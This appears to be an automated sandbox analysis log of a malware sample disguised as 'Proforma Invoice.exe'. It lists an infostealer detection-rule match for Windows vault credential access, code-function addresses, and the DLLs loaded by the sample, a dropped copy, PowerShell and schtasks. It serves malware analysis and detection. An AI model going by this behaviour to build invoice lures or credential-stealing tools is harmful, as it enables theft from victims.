                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: initial sampleStatic PE information: Filename: Proforma Invoice.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B66690_2_050B6669
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B81880_2_050B8188
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050BF0900_2_050BF090
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B7D3F0_2_050B7D3F
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B7D500_2_050B7D50
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B8B880_2_050B8B88
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B6AAC0_2_050B6AAC
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B6AA00_2_050B6AA0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_050B6AB00_2_050B6AB0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06ECEAC00_2_06ECEAC0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC6AE80_2_06EC6AE8
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06ECE3D00_2_06ECE3D0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC00400_2_06EC0040
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC00060_2_06EC0006
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013CE6B08_2_013CE6B0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013CA9608_2_013CA960
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013C4A988_2_013C4A98
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013C3E808_2_013C3E80
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013C41C88_2_013C41C8
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C265E88_2_06C265E8
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C27D908_2_06C27D90
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C255A08_2_06C255A0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C2B2488_2_06C2B248
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C223508_2_06C22350
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C276988_2_06C27698
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C25CF08_2_06C25CF0
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C2E3A88_2_06C2E3A8
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C200408_2_06C20040
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C200158_2_06C20015
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06D118208_2_06D11820
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06D119088_2_06D11908
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06C2019F8_2_06C2019F
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_0520FC409_2_0520FC40
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_052093A89_2_052093A8
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_052093B89_2_052093B8
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_052073BC9_2_052073BC
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_0520FC309_2_0520FC30
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07173A889_2_07173A88
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_071766789_2_07176678
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_0717E3889_2_0717E388
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_071781889_2_07178188
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07177D509_2_07177D50
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07177D4B9_2_07177D4B
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07178B889_2_07178B88
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07173A789_2_07173A78
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07176AB09_2_07176AB0
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07176AA09_2_07176AA0
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_0719EAC09_2_0719EAC0
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_0719E3D09_2_0719E3D0
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07196AE89_2_07196AE8
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_071900079_2_07190007
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_071900409_2_07190040
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_0103E6A113_2_0103E6A1
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_01034A9813_2_01034A98
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_01033E8013_2_01033E80
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_010341C813_2_010341C8
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_0103A96013_2_0103A960
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B55A013_2_066B55A0
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B7D9013_2_066B7D90
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066BB23813_2_066BB238
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B305813_2_066B3058
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B769813_2_066B7698
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B5CDF13_2_066B5CDF
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B234013_2_066B2340
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066BE3A813_2_066BE3A8
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B004013_2_066B0040
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B000613_2_066B0006
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_066B053613_2_066B0536
                        Source: Proforma Invoice.exeStatic PE information: invalid certificate
                        Source: Proforma Invoice.exe, 00000000.00000002.1683476539.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Proforma Invoice.exe
                        Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Proforma Invoice.exe
                        Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Proforma Invoice.exe
                        Source: Proforma Invoice.exe, 00000000.00000000.1634199768.00000000001D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePznx.exe* vs Proforma Invoice.exe
                        Source: Proforma Invoice.exe, 00000000.00000002.1685780768.0000000002638000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Proforma Invoice.exe
                        Source: Proforma Invoice.exe, 00000000.00000002.1690910619.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Proforma Invoice.exe
                        Source: Proforma Invoice.exe, 00000008.00000002.4089943461.0000000000DE9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
                        Source: Proforma Invoice.exeBinary or memory string: OriginalFilenamePznx.exe* vs Proforma Invoice.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
